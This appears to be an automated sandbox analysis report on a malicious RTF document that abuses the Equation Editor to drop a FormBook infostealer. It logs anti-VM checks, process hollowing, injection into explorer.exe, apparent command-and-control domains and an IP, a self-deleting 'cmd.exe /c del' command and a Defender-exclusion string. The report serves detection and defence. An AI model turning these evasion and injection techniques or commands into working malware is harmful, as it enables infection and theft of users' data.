            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32Jump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$kW4MtwSD.rtfJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCC24.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.expl.evad.winRTF@10/9@3/2
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
            Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: RAServer.pdb^ source: vbc.exe, 00000004.00000003.480095781.00000000007BF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.480118689.00000000007CF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.482732344.00000000007D4000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000003.413553372.0000000000430000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.414513823.00000000008A0000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.483444557.0000000000BB0000.00000040.00000001.sdmp, vbc.exe, 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, raserver.exe
            Source: Binary string: RAServer.pdb source: vbc.exe, 00000004.00000003.480095781.00000000007BF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.480118689.00000000007CF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.482732344.00000000007D4000.00000004.00000001.sdmp
            Source: ~WRF{85338F29-7DEE-45E7-AE54-3AA1C7FBE740}.tmp.0.drInitial sample: OLE indicators vbamacros = False

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: vbc[1].exe.1.dr, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: vbc.exe.1.dr, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 3.0.vbc.exe.1090000.0.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 3.2.vbc.exe.1090000.1.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.3.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.10.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.4.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.1.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.0.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.8.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.2.vbc.exe.1090000.5.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.2.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.6.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041685A push C1F93286h; ret 4_2_0041685F
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041D4B5 push eax; ret 4_2_0041D508
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041D56C push eax; ret 4_2_0041D572
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041D502 push eax; ret 4_2_0041D508
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041D50B push eax; ret 4_2_0041D572
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041660F push ss; retf 4_2_00416624
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0040B75A push esp; retf 4_2_0040B75C
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A4DFA1 push ecx; ret 4_2_00A4DFB4
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01ECDFA1 push ecx; ret 6_2_01ECDFB4
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DD4B5 push eax; ret 6_2_000DD508
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DD50B push eax; ret 6_2_000DD572
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DD502 push eax; ret 6_2_000DD508
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DD56C push eax; ret 6_2_000DD572
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000D660F push ss; retf 6_2_000D6624
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000CB75A push esp; retf 6_2_000CB75C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000D685A push C1F93286h; ret 6_2_000D685F
            Source: initial sampleStatic PE information: section name: .text entropy: 7.77893217222
            Source: initial sampleStatic PE information: section name: .text entropy: 7.77893217222
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

            Boot Survival:

            barindex
            Drops PE files to the user root directoryShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE5
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 00000003.00000002.415205594.000000000256D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2652, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: vbc.exe, 00000003.00000002.415205594.000000000256D000.00000004.00000001.sdmp, vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: vbc.exe, 00000003.00000002.415205594.000000000256D000.00000004.00000001.sdmp, vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000000C9904 second address: 00000000000C990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000000C9B7E second address: 00000000000C9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1528Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Users\Public\vbc.exe TID: 2576Thread sleep time: -37574s >= -30000sJump to behavior
            Source: C:\Users\Public\vbc.exe TID: 2588Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 2080Thread sleep time: -36000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exe TID: 2028Thread sleep time: -34000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00409AB0 rdtsc 4_2_00409AB0
            Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\Public\vbc.exeThread delayed: delay time: 37574Jump to behavior
            Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
            Source: explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000005.00000000.457933367.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
            Source: vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000005.00000000.457933367.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
            Source: explorer.exe, 00000005.00000000.431669651.00000000044E7000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
            Source: explorer.exe, 00000005.00000000.456077913.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
            Source: explorer.exe, 00000005.00000000.421288700.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000005.00000000.433667543.0000000008418000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&00000000g
            Source: vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00409AB0 rdtsc 4_2_00409AB0
            Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A526F8 mov eax, dword ptr fs:[00000030h]4_2_00A526F8
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EB00EA mov eax, dword ptr fs:[00000030h]6_2_01EB00EA
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EB0080 mov ecx, dword ptr fs:[00000030h]6_2_01EB0080
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01ED26F8 mov eax, dword ptr fs:[00000030h]6_2_01ED26F8
            Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0040ACF0 LdrLoadDll,4_2_0040ACF0
            Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.cuteprofessionalscrubs.com
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.mountfrenchlodge.net
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: 480000Jump to behavior
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\Public\vbc.exeThread register set: target process: 1764Jump to behavior
            Source: C:\Users\Public\vbc.exeThread register set: target process: 1764Jump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 1764Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
            Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exeJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"Jump to behavior
            Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
            Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
            Source: C:\Users\Public\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
